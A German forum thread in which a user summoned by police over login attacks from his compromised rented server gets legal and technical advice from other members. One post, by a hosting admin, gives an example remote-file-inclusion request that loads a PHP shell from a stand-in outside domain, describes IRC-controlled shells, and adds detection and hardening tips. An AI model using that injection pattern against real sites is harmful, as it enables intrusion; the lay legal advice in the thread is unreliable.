Einschreiben der Polizei in der Ermittlungssache "Ausspähen von Daten" ... Root-Server!
- Ersteller BlacksharkXP
- Erstellt am
BlacksharkXP
Grand Admiral Special
Guten Morgen,
an meinem heutigen freien Tag habe ich Brief von der Polizei erhalten, in dem man mich bittet, am Montag vorstellig zu werden um in einer Ermittlungssache zum Thema "Ausspähen von Daten" als Beschuldigter angehört zu werden.
Ein Anruf brachte mir ein paar mehr Informationen, wonach es um eine Wohnungsliegenschaftgesellschaft geht, die Strafanzeige gegen mich bzw. meinen Root-Server bei 1&1 erstattet hat.
Hintergrund:
Ich habe bei 1&1 einen v-Server gemietet und lasse dort meinen e-Mail Server laufen. Ich hasse Werbung und die weitergabe meiner Daten, weshalb ich schon seit mehreren Jahren meinen eigenen Mailserver betreibe. Damals von meinem privaten DSL-Anschluss per DynDNS, seit gut einem Jahr bei 1&1 unter voller Domäne und fester IP.
Basis ist ein Windows 2008 R2-Server, bei dem alle Sicherheits- und sonstigen Updates von 1&1 installiert werden (steht so auf dem Desktophintergrund) und man selbst soll nicht tätig werden.
Nun bekam ich Mitte August von 1&1 eine e-Mail das von meinem Server Angriffe ausgehen und ich 24 Stunden Zeit hätte Malware o.ä. zu entfernen.
Ich habe mir den Server angesehen, mehrere Virenscans durchlaufen lassen und mit den üblichen Tools versucht etwas ausfindig zu machen. Die Windows Firewall war aktiv, es gab keine auffälligen Syslogeinträge und Ports sind gesperrt - nur der Mailserver lief.
Hier das Syslog was 1&1 mir mitschickte:
***Logfile-Auszug des angegriffenen Servers******************************
Typ Datum Uhrzeit Quelle Kategorie Ereignis Benutzer Computer
Fehlerüberw. 17.08.2011 12:00:13 Security An-/Abmeldung 539 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:13 Security Kontoanmeldung 680 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:07 Security An-/Abmeldung 539 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:07 Security Kontoanmeldung 680 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:00 Security An-/Abmeldung 539 SYSTEM S15198873
[...]
Daraufhin bat ich 1&1 den Server zu entsperren. Kurze Zeit später war das Problem wieder da und ich entschied mich den Server neu installieren zu lassen, was dann auch geschah.
Heute der Brief, dass man mir Datenklau vorwirft und ich vernommen werden soll.
Ich bin mir keiner Schuld bewusst, in keinster Weise.
Jemand eine Idee?
an meinem heutigen freien Tag habe ich Brief von der Polizei erhalten, in dem man mich bittet, am Montag vorstellig zu werden um in einer Ermittlungssache zum Thema "Ausspähen von Daten" als Beschuldigter angehört zu werden.
Ein Anruf brachte mir ein paar mehr Informationen, wonach es um eine Wohnungsliegenschaftgesellschaft geht, die Strafanzeige gegen mich bzw. meinen Root-Server bei 1&1 erstattet hat.
Hintergrund:
Ich habe bei 1&1 einen v-Server gemietet und lasse dort meinen e-Mail Server laufen. Ich hasse Werbung und die weitergabe meiner Daten, weshalb ich schon seit mehreren Jahren meinen eigenen Mailserver betreibe. Damals von meinem privaten DSL-Anschluss per DynDNS, seit gut einem Jahr bei 1&1 unter voller Domäne und fester IP.
Basis ist ein Windows 2008 R2-Server, bei dem alle Sicherheits- und sonstigen Updates von 1&1 installiert werden (steht so auf dem Desktophintergrund) und man selbst soll nicht tätig werden.
Nun bekam ich Mitte August von 1&1 eine e-Mail das von meinem Server Angriffe ausgehen und ich 24 Stunden Zeit hätte Malware o.ä. zu entfernen.
Ich habe mir den Server angesehen, mehrere Virenscans durchlaufen lassen und mit den üblichen Tools versucht etwas ausfindig zu machen. Die Windows Firewall war aktiv, es gab keine auffälligen Syslogeinträge und Ports sind gesperrt - nur der Mailserver lief.
Hier das Syslog was 1&1 mir mitschickte:
***Logfile-Auszug des angegriffenen Servers******************************
Typ Datum Uhrzeit Quelle Kategorie Ereignis Benutzer Computer
Fehlerüberw. 17.08.2011 12:00:13 Security An-/Abmeldung 539 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:13 Security Kontoanmeldung 680 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:07 Security An-/Abmeldung 539 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:07 Security Kontoanmeldung 680 SYSTEM S15198873
Fehlerüberw. 17.08.2011 12:00:00 Security An-/Abmeldung 539 SYSTEM S15198873
[...]
Daraufhin bat ich 1&1 den Server zu entsperren. Kurze Zeit später war das Problem wieder da und ich entschied mich den Server neu installieren zu lassen, was dann auch geschah.
Heute der Brief, dass man mir Datenklau vorwirft und ich vernommen werden soll.
Ich bin mir keiner Schuld bewusst, in keinster Weise.
Jemand eine Idee?
BoMbY
Grand Admiral Special
Also wichtig ist erstmal zu wissen, dass man als Beschuldigter grundsätzlich erstmal gar nichts zur Sache zu sagen braucht. Außerdem brauchst Du auch einer Vorladung der Polizei nicht Folge zu leisten. Soweit ich weiß wäre das erst verpflichtend, wenn das von der Staatsanwaltschaft käme.
Natürlich könntest Du das was Du hier geschrieben hast auch einfach der Polizei erklären, aber es wäre auf jeden Fall sinnvoll sich vorher einen Anwalt zu nehmen. Der wird Dir dann schon sagen, was das Beste ist.
Edit: Hier nochmal in Langform: http://www.kanzlei-westen.de/was-tun-bei-vorladung-zur-polizei.htm
Natürlich könntest Du das was Du hier geschrieben hast auch einfach der Polizei erklären, aber es wäre auf jeden Fall sinnvoll sich vorher einen Anwalt zu nehmen. Der wird Dir dann schon sagen, was das Beste ist.
Edit: Hier nochmal in Langform: http://www.kanzlei-westen.de/was-tun-bei-vorladung-zur-polizei.htm
Zuletzt bearbeitet:
heiner.hemken
Admiral Special
- Mitglied seit
- 31.03.2008
- Beiträge
- 1.296
- Renomée
- 17
Auch wenn die Staatsanwaltschaft zum Gespräch bittet, muß der Beschuldigte nicht erscheinen, letztlich ist Polizei nichts anderes als der ausführende Teil der Ermittlungskette. Dieses bezieht sich nur auf den Beschuldigten nicht aber auf einen Zeugen.
Erst wenn das Gericht eine Vorladung zustellen lässt, muß man dieser nachkommen.
@TS
Hast Du irgendetwas, mit dem Du die von Dir beschriebenen Überprüfungen ohne Ergebnis nachweisen kannst?
Wenn nicht, solltest Du erstmal abwarten oder eben selbst Akteneinsicht verlangen. (§147 (7) StPO), um dann tätg zu werden.
Auf keinen Fall ist es sinvoll, sich mit den ermittelnden Beamten zu unterhalten, da diese in erster Linie nach Belastungsmaterial suchen, obwohl sie auch entlastende Momente zu finden haben, was im Alltag der Ermittlungen meist sehr schnell wegen mal unter den Tisch fällt.
Interessant finde ich auch, daß die Polizei die Vorladung als Einschreiben sendet.
Zuletzt bearbeitet:
Hardwarekäufer
Commander
- Mitglied seit
- 27.09.2010
- Beiträge
- 199
- Renomée
- 0
Sperrt der Provider nicht erstmal entsprechende Ports über die die Mailsendungen ausgehen, bevor weitere Schritte eingeleitet werden ?
Wir hatten dasselbe Problem, allerdings nicht auf einem Server sondern auf irgendwelchen Rechnern im Haus ( haben da mehrere laufen ). Die Telekom schickte ein Schreiben dass von unserer IP-Adresse ein auffälliges Verhalten ausginge. Man sperrte daraufhin gewisse Ports und bat uns um Mitteilung wenn das Problem behoben ist.
Konnten dank der Portsperrung auch selbst keine Emails versenden.
Haben dann alle Rechner erst mit einer FreeAV-Software gescannt, auf einem Rechner ein paar Viren gefunden und das ganze bei der Telekom gemeldet. Ports wurden freigeschaltet aber zwei Tage später wieder gesperrt - Problem immernoch aktiv.
Haben dann eine professionelle Software gekauft mit Lizenzen für alle Rechner, damit gescannt und weitaus mehr gefunden als die Free-Software vorher.
Danach war das Problem auch beseitigt.
Aber nur zum Problem: Üblicherweise werden da erst Ports gesperrt bevor irgendwer Anzeige stellt.
Was mich in dem Zusammenhang allerdings stutzig macht ist der Vorwurf "Ausspähen von Daten".
Dazu ist doch aktives Handeln erforderlich oder nicht ?
Wir hatten dasselbe Problem, allerdings nicht auf einem Server sondern auf irgendwelchen Rechnern im Haus ( haben da mehrere laufen ). Die Telekom schickte ein Schreiben dass von unserer IP-Adresse ein auffälliges Verhalten ausginge. Man sperrte daraufhin gewisse Ports und bat uns um Mitteilung wenn das Problem behoben ist.
Konnten dank der Portsperrung auch selbst keine Emails versenden.
Haben dann alle Rechner erst mit einer FreeAV-Software gescannt, auf einem Rechner ein paar Viren gefunden und das ganze bei der Telekom gemeldet. Ports wurden freigeschaltet aber zwei Tage später wieder gesperrt - Problem immernoch aktiv.
Haben dann eine professionelle Software gekauft mit Lizenzen für alle Rechner, damit gescannt und weitaus mehr gefunden als die Free-Software vorher.
Danach war das Problem auch beseitigt.
Aber nur zum Problem: Üblicherweise werden da erst Ports gesperrt bevor irgendwer Anzeige stellt.
Was mich in dem Zusammenhang allerdings stutzig macht ist der Vorwurf "Ausspähen von Daten".
Dazu ist doch aktives Handeln erforderlich oder nicht ?
Ist ja nicht das erste mal, das kompromittierte Server zum eindringen in andere Systeme verwendet werden, um die Spur des Angreifers zu verschleiern.
@Topic:
Du müsstest also im günstigsten Fall auf irgendeine Art nachweisen können, dass nicht du selbst, sondern ein Dritter deinen Server benutzt hat. Vll. reicht dabei schon die Feststellung von 1&1, dass der Server verdächtige Aktionen ausgeführt hat und du ihn darauf hin neu installieren lassen hast.
heiner.hemken
Admiral Special
- Mitglied seit
- 31.03.2008
- Beiträge
- 1.296
- Renomée
- 17
Unter Ausspähen von Daten fallen auch Phishing-Mails.
BlacksharkXP
Grand Admiral Special
Also,
ich habe mit einem Beamten telefonisch Kontakt gehabt und mir mal kurz erklären lassen worum es eigentlich geht, denn die Vorladung selbst war ja sehr allgemein gehalten.
Soweit ich es verstanden habe, geht es wohl darum, dass von meinem Server aus jemand versucht hat sich auf einem anderen Server einzuloggen. Dieser Server gehört wohl einer Firma (Wohnungsgesellschaft o.ä.) die vermutlich auch von 1&1 eine Infomail bekommen haben, dass von meinem Server aus Angriffe auf denen ihren Server stattfinden und man mich informiert hätte. Vermutlich hat dort jemand dieses direkt an die interne Rechtsabteilung weitergeleitet und diese eine Anzeige bei der Polizei erstellt.
Fakt ist: Ich habe nichts unrechtmäßiges gemacht und bin mir keiner Schuld bewusst.
Ich habe die erste e-Mail von 1&1 bekommen, dass von meinem Server Angriffe getätigt werden und mein Server gesperrt wurde. Anschließend habe ich bei 1&1 angerufen und mitgeteilt, dass ich mich um das Problem kümmere. Nachdem mein Server wieder Online war, habe ich sämtliche Daten mit einem Virenscanner überprüft, Malware-Scanner durchlaufen lassen etc. und nichts gefunden.
Keine 3 Tage später das selbe Spiel, Server wurde Offline geschaltet und ich habe erneut nachgeschaut und nichts gefunden. Daraufhin habe ich den Server neu installieren lassen und somit alles auf "0" setzen lassen.
Ich würde schon gerne zu dem entsprechenden Termin gehen und dort die Tickets bzw. Unterlagen mitnehmen inkl. meiner e-Mail an 1&1 mit der Bitte den Server neu zu installieren.
ich habe mit einem Beamten telefonisch Kontakt gehabt und mir mal kurz erklären lassen worum es eigentlich geht, denn die Vorladung selbst war ja sehr allgemein gehalten.
Soweit ich es verstanden habe, geht es wohl darum, dass von meinem Server aus jemand versucht hat sich auf einem anderen Server einzuloggen. Dieser Server gehört wohl einer Firma (Wohnungsgesellschaft o.ä.) die vermutlich auch von 1&1 eine Infomail bekommen haben, dass von meinem Server aus Angriffe auf denen ihren Server stattfinden und man mich informiert hätte. Vermutlich hat dort jemand dieses direkt an die interne Rechtsabteilung weitergeleitet und diese eine Anzeige bei der Polizei erstellt.
Fakt ist: Ich habe nichts unrechtmäßiges gemacht und bin mir keiner Schuld bewusst.
Ich habe die erste e-Mail von 1&1 bekommen, dass von meinem Server Angriffe getätigt werden und mein Server gesperrt wurde. Anschließend habe ich bei 1&1 angerufen und mitgeteilt, dass ich mich um das Problem kümmere. Nachdem mein Server wieder Online war, habe ich sämtliche Daten mit einem Virenscanner überprüft, Malware-Scanner durchlaufen lassen etc. und nichts gefunden.
Keine 3 Tage später das selbe Spiel, Server wurde Offline geschaltet und ich habe erneut nachgeschaut und nichts gefunden. Daraufhin habe ich den Server neu installieren lassen und somit alles auf "0" setzen lassen.
Ich würde schon gerne zu dem entsprechenden Termin gehen und dort die Tickets bzw. Unterlagen mitnehmen inkl. meiner e-Mail an 1&1 mit der Bitte den Server neu zu installieren.
tspoon
Grand Admiral Special
nen kleiner TIP: ohne Anwalt würde ich da nicht hingehen.
Mit Ausspähen von Daten ist gemeint, das über den Server PhishingMails ausgeleifert wurden. Dies kann auf verschiedene Wege geschehen sein.
1. Sicherheitslücke in einem PHP-Script,
2. zu einfaches Mailaccount-Passwort etc.
3. einer Sicherheitslücke im Betriebsystem etc.
Das Problem bei der Sache ist, das du nachweisen musst das du es nicht warst. Nur wenn du schon den Server platt gemacht hast und wahrscheinlich keine Logfiles mehr hast, wird es schwer für dich dies nachzuweisen.
Deshalb würde ich dir anraten zu einem Anwalt für Internetrecht zu gehen, den es kann schnell teuer werden. Wenn zum Bsp eine Bank klagt deren Kunden um tausende von Euros etc durch Phishing losgeworden sind.
Desweiteren würde ich keine Informationen über ein laufendes oder wahrscheinlich eintrettendes Verfahren im Internet veröffentlichen ...
Bevor einer rumdiskutiert. Ich bin Administrator bei einem Webhoster und darf unteranderem auch Phishing bekämpfen etc ...
Beachte auch, das ein Forum keine Rechtsberatung ersetz oder darstellt, da jeder Fall im einzelnen betrachtet werden muss.
Mit Ausspähen von Daten ist gemeint, das über den Server PhishingMails ausgeleifert wurden. Dies kann auf verschiedene Wege geschehen sein.
1. Sicherheitslücke in einem PHP-Script,
2. zu einfaches Mailaccount-Passwort etc.
3. einer Sicherheitslücke im Betriebsystem etc.
Das Problem bei der Sache ist, das du nachweisen musst das du es nicht warst. Nur wenn du schon den Server platt gemacht hast und wahrscheinlich keine Logfiles mehr hast, wird es schwer für dich dies nachzuweisen.
Deshalb würde ich dir anraten zu einem Anwalt für Internetrecht zu gehen, den es kann schnell teuer werden. Wenn zum Bsp eine Bank klagt deren Kunden um tausende von Euros etc durch Phishing losgeworden sind.
Berichtigung weiter unten: Deshalb muss die eine Stellungnahme spätestens, wenn die Anwaltschaft klingelt abgeben. Dies würde ich aber von einem Anwalt machen lassen, den da langt meist ein 10 Zeiler per Brief nicht. Dieser kann auch Informationen bei 1und1 anfordern falls die Logfiles der Logins etc haben.
Desweiteren würde ich keine Informationen über ein laufendes oder wahrscheinlich eintrettendes Verfahren im Internet veröffentlichen ...
Bevor einer rumdiskutiert. Ich bin Administrator bei einem Webhoster und darf unteranderem auch Phishing bekämpfen etc ...
Beachte auch, das ein Forum keine Rechtsberatung ersetz oder darstellt, da jeder Fall im einzelnen betrachtet werden muss.
Zuletzt bearbeitet:
heiner.hemken
Admiral Special
- Mitglied seit
- 31.03.2008
- Beiträge
- 1.296
- Renomée
- 17
Anwaltschaft ist was genau? Wenn es die StA sein soll, dann bitte erklären, warum er als Beschuldigter hier eine Stellungnahme abgeben muß.
Zuletzt bearbeitet:
tspoon
Grand Admiral Special
Bissl Kacke geschrieben, gebs es zu.
Sollte heißen wenns zu ner Verhandlung kommt, muss er dann belegen können, das er nicht der Versender war. Dazu brauch er aber ein Blick in die Beweise etc, das kann nur ein Anwalt.
Der Text war viel länger und ist beim Kürzen nen wenig unverständlich geworden. Sorry.
Sollte heißen wenns zu ner Verhandlung kommt, muss er dann belegen können, das er nicht der Versender war. Dazu brauch er aber ein Blick in die Beweise etc, das kann nur ein Anwalt.
Der Text war viel länger und ist beim Kürzen nen wenig unverständlich geworden. Sorry.
BoMbY
Grand Admiral Special
Also, Du musst einer Vorladung durch die Staatsanwaltschaft folge leisten (§ 163a StPO (3): "Der Beschuldigte ist verpflichtet, auf Ladung vor der Staatsanwaltschaft zu erscheinen."), das heißt aber natürlich nicht, dass man als Beschuldigter irgendwas zur Sache sagen muss.
Hardwarekäufer
Commander
- Mitglied seit
- 27.09.2010
- Beiträge
- 199
- Renomée
- 0
Ich find das kuroiseste an der Sache, dass 1&1 als Provider hier sogar Leuten mitteilt dass ihre System von Server X angegriffen werden anstatt einzuschreiten und die Ports zu blockieren.
burningstar
Vice Admiral Special
Du nutzt doch auf deinem PC sicher irgendeine Software um die mails von deinem Server zu empfangen und an ihn zum verschicken weiter zu leiten. Für gewöhnlich ist nicht der mailserver selbst das Problem, sondern der PC zu Hause, der sich irgendwas eingefangen hat.
Bei uns ist es zumindest immer so, dass ein Nutzer wieder auf fragwürdigen Seiten unterwegs war oder die falschen Mails geöffnet hat und schon gehen von ihm, ohne das er etwas davon weiss, spammails aus. Von Außen sieht es dann natürlich so aus, als würde der Server/Router diese Mails verteilen. Meistens merkt man das auch erst, wenn sich eines der Opfer beschwert.
Hast du denn dein eigenes System mal grundlegend überprüft, bzw. neu aufgesetzt, als die erste Warnung kam?
Bei uns ist es zumindest immer so, dass ein Nutzer wieder auf fragwürdigen Seiten unterwegs war oder die falschen Mails geöffnet hat und schon gehen von ihm, ohne das er etwas davon weiss, spammails aus. Von Außen sieht es dann natürlich so aus, als würde der Server/Router diese Mails verteilen. Meistens merkt man das auch erst, wenn sich eines der Opfer beschwert.
Hast du denn dein eigenes System mal grundlegend überprüft, bzw. neu aufgesetzt, als die erste Warnung kam?
BlacksharkXP
Grand Admiral Special
Es ist eine Vorladung der Polizei - nicht Staatsanwaltschaft!
Desweiteren habe ich meine Rechtsschutzversicherung kontaktiert und den Vorgang dort hingeleitet.
Fakt ist:
Es geht wohl nicht um Spam-Mails, sondern um das (im Abstand von 4 Sekunden) versuchte einloggen von meinem Server auf einen anderen Server. Aufgrund der Mails von 1&1 habe ich auch rausgefunden, dass mein Server "wahllos" andere Server im 1&1 Netzwerk kontaktiert hat und nicht nur der eine (wo der Besitzer mich nun angezeigt hat).
Gesichert war der Server und neu installiert ist er inzwischen auch. Alle Ports waren gesperrt, nur HTTPS war geöffnet und es lief weder ein FTP, noch sonstwelche Serverdienste. Nur SMTP, HTTPS und IMAPS.
Firewallregeln waren auch definiert und die Mailserver Software ist auf Sicherheit getrimmt. Ich kanns einfach nicht verstehen
Desweiteren habe ich meine Rechtsschutzversicherung kontaktiert und den Vorgang dort hingeleitet.
Fakt ist:
Es geht wohl nicht um Spam-Mails, sondern um das (im Abstand von 4 Sekunden) versuchte einloggen von meinem Server auf einen anderen Server. Aufgrund der Mails von 1&1 habe ich auch rausgefunden, dass mein Server "wahllos" andere Server im 1&1 Netzwerk kontaktiert hat und nicht nur der eine (wo der Besitzer mich nun angezeigt hat).
Gesichert war der Server und neu installiert ist er inzwischen auch. Alle Ports waren gesperrt, nur HTTPS war geöffnet und es lief weder ein FTP, noch sonstwelche Serverdienste. Nur SMTP, HTTPS und IMAPS.
Firewallregeln waren auch definiert und die Mailserver Software ist auf Sicherheit getrimmt. Ich kanns einfach nicht verstehen
mj
Technische Administration, Dinosaurier, ,
Das wird ein Standard-Bot gewesen sein. Die Dinger kursieren zu Hauf - häng mal einen Rechner mit offenem Port 22 (SSH) direkt ans Internet und keine zehn Sekunden später hast du dutzende Loginversuche mit Standardnamen (John, Jim, Jane, Jack, ...) pro Sekunde. Diese Botnetze müssen ja irgendwo laufen, dein Server war wohl für einen mehr oder weniger kurzen Zeitraum Teil eines solchen Botnetzes. Allerdings wäre ich mir an dieser Stelle noch gar nicht sicher ob der Versuch eines Logins bereits eine Straftat darstellt oder nicht, das müssen die Juristen hier beurteilen 
Vermutlich hat sich der Angreifer eine Sicherheitslücke in deinem System zu Nutze gemacht, selber Software installiert und mittels dieser dann ferngesteuert Kommandos übermittelt und ausgeführt.
Vermutlich hat sich der Angreifer eine Sicherheitslücke in deinem System zu Nutze gemacht, selber Software installiert und mittels dieser dann ferngesteuert Kommandos übermittelt und ausgeführt.
BlacksharkXP
Grand Admiral Special
Genau so wierd es ausgesehen haben. Fraglich wie ich das nun genau abkläre. Am Montag werde ich wohl nur geringe Angaben machen und mich sonst nur durch meinen Anwalt äussern.
Zuletzt bearbeitet:
Das mit den "geringen Angaben" wäre mir schon zu gefährlich. Ich würde mich an deiner Stelle strickt an die Empfehlung der Anwaltsseite halten, den Termin aus Gründen der Höflichkeit ohne weitere Angaben abzusagen oder einfach nicht zu erscheinen.
Mach mal und gehe hin. Besser kann man sich sein eigenes Grab nicht schaufeln.
Was glaubst du erreichst du da? Du bist Beschuldigter, nicht Zeuge. Da will dir keiner was gutes die wollen dir nur einen rein würgen.
Egal was du da sagst wird am Ende gegen dich benutzt werden. Auch wenn es noch so unbedeutend für dich klingt. Allein schon der Satz das 1&1 alles für dich macht und du gar nicht weiter den Server gesichert hast wird dir am Ende mindestens als Mitstörer angezettelt.
Wenn du schlau bist gehst du da nicht hin. Aber aus Erfahrung weiß ich das die meisten eben nicht schlau sind.
Rechtsschutz kannst du vergessen da die kein Strafrecht versichern.
Was glaubst du erreichst du da? Du bist Beschuldigter, nicht Zeuge. Da will dir keiner was gutes die wollen dir nur einen rein würgen.
Egal was du da sagst wird am Ende gegen dich benutzt werden. Auch wenn es noch so unbedeutend für dich klingt. Allein schon der Satz das 1&1 alles für dich macht und du gar nicht weiter den Server gesichert hast wird dir am Ende mindestens als Mitstörer angezettelt.
Wenn du schlau bist gehst du da nicht hin. Aber aus Erfahrung weiß ich das die meisten eben nicht schlau sind.
Rechtsschutz kannst du vergessen da die kein Strafrecht versichern.
BlacksharkXP
Grand Admiral Special
Advocard übernimmt den Fall, dein letzter Satz ist somit nicht korrekt.
Desweiteren hat man mir mitgeteilt, dass ich den Termin warnehmen kann und die Angaben auf ein nötigstes beschränken soll, nach dem "Ja/Nein" Prinzip. Ansonsten nur Angaben zur Person.
Desweiteren hat man mir mitgeteilt, dass ich den Termin warnehmen kann und die Angaben auf ein nötigstes beschränken soll, nach dem "Ja/Nein" Prinzip. Ansonsten nur Angaben zur Person.
Schattenreich
Grand Admiral Special
eigendlich müsste 1&1 sehen wer sich eingelogt hatt da die IP gespeichert werden
oder der jenge der das gemacht hatt war so schlau das er sich zu grif auf den pc geschaft hatt und dann über deine leitung sich zugrif zu dein Server und dan erst die angrife Gesatrtet hatt
Daher würde ich mall dein pc überprüfen und auch mall in router nach schauen
das ist so bei unseren root server so das die IP gespeichert werden
oder der jenge der das gemacht hatt war so schlau das er sich zu grif auf den pc geschaft hatt und dann über deine leitung sich zugrif zu dein Server und dan erst die angrife Gesatrtet hatt
Daher würde ich mall dein pc überprüfen und auch mall in router nach schauen
das ist so bei unseren root server so das die IP gespeichert werden
Zuletzt bearbeitet:
Na ja zumindest hatte ich mit dem vorletzten Satz recht.
Emploi
Grand Admiral Special
Als alter Lawblog Fan, aus persönlicher Erfahrung und ohne die Arbeit der Polizei herabwürdigen zu wollen: Geh da nicht hin, zumindest nicht ohne eigenen kompetenten Anwalt.
Der alte Spruch: „Alles was Sie sagen, kann und wird gegen Sie verwendet werden“ trifft voll und ganz zu und sei es noch so belanglos, wie z.B:"...der Tag hat schon schlecht angefangen..."...
http://ra-danckwardt.de/index.php?page=78
Der alte Spruch: „Alles was Sie sagen, kann und wird gegen Sie verwendet werden“ trifft voll und ganz zu und sei es noch so belanglos, wie z.B:"...der Tag hat schon schlecht angefangen..."...
http://ra-danckwardt.de/index.php?page=78
Zuletzt bearbeitet:
tspoon
Grand Admiral Special
^^ endlich mal einer ders verständlich erklärt. Sehr guter Link. Dennoch bleibe ich dabei, das ein Forum oder das Internet keine Beratung und Prüfung durch einen Anwalt ersetzt.
Wenn nur http offen war, werden die Angreifer Crossite-Scripting betrieben haben. Sprich eine PHPSHELL von extern eingebunden haben oder über eine Sicheitslücke auf den Server geladen haben und diese PHPSHELL dann zum Angriff auf andere Server verwendet haben.
Wenn nur http offen war, werden die Angreifer Crossite-Scripting betrieben haben. Sprich eine PHPSHELL von extern eingebunden haben oder über eine Sicheitslücke auf den Server geladen haben und diese PHPSHELL dann zum Angriff auf andere Server verwendet haben.
Bevor Ihr auf falsch Gedanken kommt das ich nen Angreifer bin... Ich bin Administrator in einem Rechenzentrum, wo ich unter anderem auch Abuse (Spam und Phishing bearbeite) Im Gegensatz zu 1&1 werden bei uns die Server überwacht und es erfolgt eine Meldung. Die Technik unterbindet dann den Aufruf sofort und informiert den Eigentümer über die Sicherheitslücke.
Nen Tip wer seinen Webspace sicherer machen will, kann Crossitescripting per RewriteRegel unterbinden oder per PHP-Einstellungen. Siehe allow_url_inlude in der Manual von PHP. Was auch häufig vergessen wird open_basedir. sehr gefährlich wenn nicht gesetzt.
Sehr anfällige Systeme sind: osCommerce (Sicherheitslücke im Filemanger des Andminbereichs), Joomla (Crosssitescripting), Wordpress (Spam über Kommentarfunktion und Loginbereich) oder andere CMS Systeme. Auch sehr beliebt sind selber gestaltet Seiten, welche Aufrufe wie index.php?site=contact.php haben. Da macht der Angreifer gern mal nen Test wie: index.php?site=http://irgendnedomain.de/phpshell.txt. Die phpshell.txt enthält dann PHP-Quellcode, welche durch den include der Variable "site" in der index.php auf euren Server ausgeführt wird.
PHPSHELLs sind meist nen allround Tool und erlauben DDOS oder halt Loginattacken mit einem Klick. Auch gibt es welche, die gleich mal paar Kopien von sich selber auf dem Webspace ablegen und dann die URL, wie Sie zu erreichen sind an nen IRC-Server senden.
Der Angreifer joint dann den IRC-Channel und gibt nur noch das Ziel an und ein IRC-Bot starten dann auf allen bekannten URLs welche eingeleifert wurden, den nötigen Befehl.
Tja so siehts aus. Wie kann man dies nun erkennen.
1. Durchsuchen des accesslog-Files nach =http, =ftp und libperl aufrufen
2. Da ein Zugriff erst geloggt wird wenn er beendet wurde, kann das Script noch aktiv sein, also aktuellen Apachestatus nach =http oder =ftp prüfen
Angreifer sind nicht dumm so übergeben Sie meist die "://" HTML-codiert, um diese zu verschleiern. Da er aber seinen Server platt gemacht hat siehts wohl eher Mau mit Logfiles aus...
Nen Tip wer seinen Webspace sicherer machen will, kann Crossitescripting per RewriteRegel unterbinden oder per PHP-Einstellungen. Siehe allow_url_inlude in der Manual von PHP. Was auch häufig vergessen wird open_basedir. sehr gefährlich wenn nicht gesetzt.
Sehr anfällige Systeme sind: osCommerce (Sicherheitslücke im Filemanger des Andminbereichs), Joomla (Crosssitescripting), Wordpress (Spam über Kommentarfunktion und Loginbereich) oder andere CMS Systeme. Auch sehr beliebt sind selber gestaltet Seiten, welche Aufrufe wie index.php?site=contact.php haben. Da macht der Angreifer gern mal nen Test wie: index.php?site=http://irgendnedomain.de/phpshell.txt. Die phpshell.txt enthält dann PHP-Quellcode, welche durch den include der Variable "site" in der index.php auf euren Server ausgeführt wird.
PHPSHELLs sind meist nen allround Tool und erlauben DDOS oder halt Loginattacken mit einem Klick. Auch gibt es welche, die gleich mal paar Kopien von sich selber auf dem Webspace ablegen und dann die URL, wie Sie zu erreichen sind an nen IRC-Server senden.
Der Angreifer joint dann den IRC-Channel und gibt nur noch das Ziel an und ein IRC-Bot starten dann auf allen bekannten URLs welche eingeleifert wurden, den nötigen Befehl.
Tja so siehts aus. Wie kann man dies nun erkennen.
1. Durchsuchen des accesslog-Files nach =http, =ftp und libperl aufrufen
2. Da ein Zugriff erst geloggt wird wenn er beendet wurde, kann das Script noch aktiv sein, also aktuellen Apachestatus nach =http oder =ftp prüfen
Angreifer sind nicht dumm so übergeben Sie meist die "://" HTML-codiert, um diese zu verschleiern. Da er aber seinen Server platt gemacht hat siehts wohl eher Mau mit Logfiles aus...
Zuletzt bearbeitet:
Hi tspoon
was mich an dem stört ist wenn 1&1 das bemerkt hat müssen sie auch wissen was los war, und das könnte ihn entlasten wenn sie wenigstens den zugriff auf den server gelogt haben (ip technisch)
aber der te kann mal sagen wie es weiter ging.
viel erfolg
lg
was mich an dem stört ist wenn 1&1 das bemerkt hat müssen sie auch wissen was los war, und das könnte ihn entlasten wenn sie wenigstens den zugriff auf den server gelogt haben (ip technisch)
aber der te kann mal sagen wie es weiter ging.
viel erfolg
lg
Ähnliche Themen
